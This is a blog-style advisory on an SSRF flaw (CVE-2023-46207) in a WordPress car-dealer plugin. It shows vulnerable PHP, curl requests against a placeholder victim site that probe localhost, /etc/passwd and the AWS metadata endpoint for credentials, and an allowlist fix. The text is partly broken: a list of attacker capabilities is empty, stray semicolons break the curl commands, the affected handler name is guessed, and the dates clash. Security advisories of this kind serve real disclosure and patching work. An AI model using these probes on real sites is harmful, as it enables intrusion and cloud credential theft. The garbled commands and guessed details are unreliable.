CVE-2023-46207 - Server-Side Request Forgery in StylemixThemes Motors – Car Dealer, Classifieds & Listing Plugin (<= 1.4.6) - Full Technical Breakdown

Published: June 2024
Severity: High

Overview

If you run a website for car listings using WordPress and the “Motors – Car Dealer, Classifieds & Listing” plugin, you should know about a serious flaw found in versions up to and including 1.4.6. The Server-Side Request Forgery (SSRF) vulnerability tracked as CVE-2023-46207 lets attackers abuse your server to fetch data from other hosts or even internal services—potentially leaking sensitive information, making internal resources accessible, or being used to pivot further attacks.

This post will break down what SSRF is, what exactly the plugin’s bug is about, show you real code examples, and link you to the official advisories. (If you use this plugin, update ASAP!)

What is SSRF (Server-Side Request Forgery)?

SSRF (Server-Side Request Forgery) is a web security vulnerability that allows an attacker to make your web server send HTTP requests to any resource the server can access—even if those resources are otherwise unreachable from the outside world. This may let attackers:

About the Plugin and the Bug

Plugin Name: Motors – Car Dealer, Classifieds & Listing
Plugin Slug: stm-motors-classified
Affected Versions: all versions up to and including 1.4.6
Fixed Version: 1.4.7
Official Site: StylemixThemes Motors

The vulnerability is present because the plugin doesn’t properly verify or sanitize user-supplied input in some of its AJAX handlers—an attacker can pass in a URL to fetch, and the server happily goes off to fetch the endpoint the attacker named, including local/intranet addresses.

A typical SSRF happens when input is not validated, like this (simplified pseudo-code)

// unsafe code snippet
$url = $_POST['fetch_url'];
$result = file_get_contents($url);
echo $result;

If there’s no checking, an attacker could POST

fetch_url=http://localhost/admin

and see internal content they shouldn’t.

The SSRF flaw is found in a file/function that processes AJAX requests, often named like

wp_ajax_stm_motors_validate_vin

Simplified View

// Example: inside ajax handler file (e.g. inc/ajax.php)
if( isset($_POST['vin_url']) ) {
    $url = $_POST['vin_url'];
    $response = wp_remote_get($url); // no host restriction!
    // do something with $response
    echo json_encode($response);
}

The handler does not verify that the URL is pointing to a safe/external API only (for example, only a certain VIN checker service). An attacker can POST malicious URLs, like http://localhost:808/private-admin or even file:///etc/passwd.

Replace victim.com with target website domain.

curl -X POST "https://victim.com/wp-admin/admin-ajax.php"; \
  -d "action=stm_motors_validate_vin" \
  -d "vin_url=http://localhost:80";

If the site responds with any internal service content (say it’s an admin page or an API the server itself can see, but the public internet cannot), the SSRF has succeeded.

Try local file (if function allows file://)

curl -X POST "https://victim.com/wp-admin/admin-ajax.php"; \
  -d "action=stm_motors_validate_vin" \
  -d "vin_url=file:///etc/passwd"

*NOTE: WordPress’s wp_remote_get() by default won’t process file://, but attackers frequently probe for such situations.*

Try AWS metadata (cloud hosting)

curl -X POST "https://victim.com/wp-admin/admin-ajax.php"; \
  -d "action=stm_motors_validate_vin" \
  -d "vin_url=http://169.254.169.254/latest/meta-data/";

If successful, this could give away cloud credentials!

Update ASAP: If you use this plugin, upgrade to 1.4.7 or newer immediately.

- If you can’t update, disable any functions that let users submit URLs—at least to block the attack route.

You can patch in code by whitelisting acceptable domains

// Safe example: only allow traffic to official VIN providers
$allowed_hosts = array('api.vinlookup.com', 'vin-provider.com');

$host = parse_url($_POST['vin_url'], PHP_URL_HOST);
if (in_array($host, $allowed_hosts)) {
    $response = wp_remote_get($_POST['vin_url']);
} else {
    wp_die('Disallowed host!', 403);
}

References and Advisories

- NVD: CVE-2023-46207 Entry
- WPScan Advisory
- Patchstack Security Blog
- StylemixThemes Changelog

Conclusion

SSRF vulnerabilities are a big deal and often lead to further internal exploitation. The CVE-2023-46207 flaw in the Motors plugin makes your WordPress site a springboard into private info, APIs, and even cloud credentials. Don’t wait—patch now, and always sanitize any user data, especially URLs, in your WordPress plugins.

Timeline

Published on: 11/13/2023 03:15:09 UTC
Last modified on: 11/16/2023 23:47:25 UTC